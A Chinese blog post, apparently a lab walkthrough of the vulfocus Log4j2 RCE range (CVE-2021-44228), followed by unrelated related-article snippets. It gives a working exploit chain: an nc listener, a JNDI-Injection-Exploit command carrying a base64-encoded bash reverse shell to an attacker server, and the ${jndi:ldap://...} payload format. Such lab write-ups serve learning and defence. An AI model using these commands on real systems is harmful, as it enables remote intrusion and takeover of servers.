【无标题】

最新推荐文章于 2024-05-30 22:30:23 发布
最新推荐文章于 2024-05-30 22:30:23 发布
阅读量265 收藏 3
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43348375/article/details/137271392
版权

vulfocus靶场—Log4j2远程命令执行(CVE-2021-44228)

打开靶场,出现页面,点击???,观察url,发现端倪
很明显这里是在payload后面输入利用代码
在这里插入图片描述
直接祭出神器:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
首先你要登录你的公网服务器,依次执行如下命令

nc -lvvp 3344        #监听本机的3344端口,以便后期的反弹shell接受
#新打开一个ssh连接
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC8zMzQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 攻击IP地址
#-C 表示执行的命令
#-A 表示攻击机器IP地址,就是反连IP
#bash -c 表示读取其后面的字符串作为要执行的命令
#YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC8zMzQ0IDA+JjE= 是bash -i >& /dev/tcp/ip/3344 0>&1的base64编码
#base64,-d 表示base64解码
#bash,-i 表示提供一个交互式的界面

直接在你的公网服务器上执行就完了
在这里插入图片描述
然后将输出的粉红色的命令摘取一个,在burp中进行测试
在这里插入图片描述
此时查看公网监听的有了回应,成功上线
在这里插入图片描述
进入tmp/目录查看flag
在这里插入图片描述
成功通关
在这里插入图片描述

在这里插入图片描述

总结

此靶场主要考察以下几点:
1、log4j rce漏洞 CVE-2021-44228
漏洞的形成主要是lookup()函数动态加载的远程恶意类,DNS、RMI、LDAP都是JNDI的远程加载协议。
2、关键参数,payload,其他环境不一定是此参数。
3、格式,${jndi:ldap://xxxxxx}
飞天猫狗
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Qt-无标题窗口
学而思
05-21 7236
        今天学习了下无标题窗口,于是来记录下我的学习过程首先建立一个Qt Widgets Application继承QWidget类创建完后直接运行就得到了如下效果那么,既然是无标题窗口就要去掉窗口栏啊,于是加上setWindowFlags(Qt::FramelessWindowHint | Qt::WindowMinimizeButtonHint);去掉标题栏,但是这样整个窗口就不能移动...
android设置无标题栏 、 状态栏
z1web的博客
11-22 6569
设置无标题栏,状态栏的方式有三种 第一种:在java文件中修改(注意:如果改成隐藏标题栏,那么MainActivity必须继承Activity) public class MainActivity extends Activity { @Override protected void onCreate(Bundle savedInstanceState) { ...
C# 移动无标题栏无边框窗体的3种方法
SabreWulf
03-13 2224
目录 第一种:手工移动 第二种:调用系统API 1.引入下面代码 前提需要引入命名空间using System.Runtime.InteropServices 2.增加鼠标按下事件发送消息,让系统误以为按下是标题栏 第三种,重写 WndProc 第一种:手工移动 直接通过修改窗体位置从而达到移动窗体的效果 //定义一个位置信息Point用于存储鼠标位置 private Point mPoint; /// <summary>
Qt实现改变无标题栏窗体大小及移动窗体
danshiming的博客
11-10 2926
Qt实现鼠标左键拖动无标题栏窗体右下角改变窗体大小及移动窗体
Chrome 无标题 哭脸 已崩溃
wkj52719的博客
05-24 4170
谷歌浏览器chrome突然打开后任何页面均显示为无标题,哭脸。鼠标选中sheet页面时,提示已崩溃。 无法打开设置、开发工具箱 经过检查,是chrome的Userdata数据出错,导致页面加载无法正常展示页面。 修复办法: 打开文件夹C:\Users\{privateUserId}\AppData\Local\Google\Chrome,删除User data文件夹,如果需要备份UserData,请备份User Data到其他地方。 ...
qt无标题栏设置
xiatiankuaizou的专栏
01-25 3870
1.设置没有标题栏 this-&gt;setWindowFlags(Qt::FramelessWindowHint); 2.鼠标移动大小 void Dialog::resizeEvent(QResizeEvent *event) { ui-&gt;Button-&gt;setGeometry(0, 0, (82*this-&gt;width())/1366, (48*this-&...
如何用Qt实现一个无标题栏、半透明、置顶(悬浮)的窗口
xktesla的专栏
02-17 1818
在Qt框架中,要实现一个无标题栏、半透明、置顶(悬浮)的窗口,需要一些特定的设置和技巧。废话不多说,下面我将以DrawClient软件为例,介绍一下实现这种效果的四个要点。在窗口的构造函数中设置窗口的样式,在强调一下,一定要找构造函数中设置,否则有些平台可能无效。
【QT学习】如何移动无标题栏窗口?(图文详解)
孤生i的博客
10-05 1746
本篇,作者将分享如何移动无标题栏的窗口。
pb powerbuiler 无标题栏窗口的移动
xiaox的专栏
07-23 1304
在使用 response! 或 popup! 窗口 的时候,经常会希望关闭标题栏(例图1),但关闭了标题栏,这个窗口就无法移动了。  (图1) 让无标题栏窗口的移动的设置方法: 1、在窗口中新建一个自定义事件(例图2,事件名 ue_cnhit),event id 选择pbm_cnhittest 2、添加脚本: return 2  3、鼠标点击窗口没有控件的位置,长按左键,就可以移动窗...
VC去掉'无标题'字样的方法.zip
11-21
Visual c++去掉'无标题'字样的方法.zip
Qt无标题窗口
05-21
一个比较简单的Qt无标题窗口,基本实现了现在默认窗口自带的功能,可以用于界面美化自绘标题栏。
标题
02-12
标题
visual c++取掉对话框窗口的 -无标题 字样的方法
08-04
vc++取掉窗口的 -无标题 字样
linux系统安全及应用
最新发布
Alone8046的博客
05-30 621
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一种标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各种认证方式和方法。(配置的时候一定要注意:有限放开原则,用什么给什么,不需要的不加)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
登录安全分析报告:小米官网注册
Explinks的博客
05-29 1077
图形验证及交互验证方式的安全性到底如何?请看具体分析。
云端数据提取:安全、高效地利用无限资源
Shaidou_Data的博客
05-30 732
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1109
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
富格林:谨防被骗实现安全交易
fgl100的博客
05-30 389
富格林指出,进行现货黄金投资的时候,有不少投资者都会犯下这个危及安全交易的毛病,就是没有合理控制好交易成本。如果投资成本没有控制好,把自己账户资金的全部都放进去,那么一旦逆势波动,就可能会发生爆仓的情况。成本和仓位不混为一谈,有些投资者认为成本和仓位是一样的,但并不是的,成本是投资者,投入多少金额的。如果投资的仓位较大,成本也会大,但是成本大,仓位不一定大,同时大仓位带来的收益与风险是并存的。以上的是富格林分享的控制费用成本的实用方法,有助于帮助投资者通过减少支出,从而增加利润。
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@android:style/Theme.NoTitleBar"“属性。这样可以通过Android自带的主题去掉标题栏。 2. 使用自定义的主题,可以在样式表中添加以下代码: <style name="AppTheme" parent="Theme.AppCompat.NoActionBar"> <!-- ...其他样式... --> </style> 这种方式可以通过设置主题去除ActionBar和标题栏,同时保留其他布局元素。 3. 去掉代码中的setTitle()方法,这是一种最简单的方法,通过不设置Activity的标题来实现无标题。 以上就是三种常见的实现Android无标题的方式,开发者可以根据实际需求进行选择。值得注意的是,去除标题栏可能会影响用户的导航体验,因此在设计上需要考虑周全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值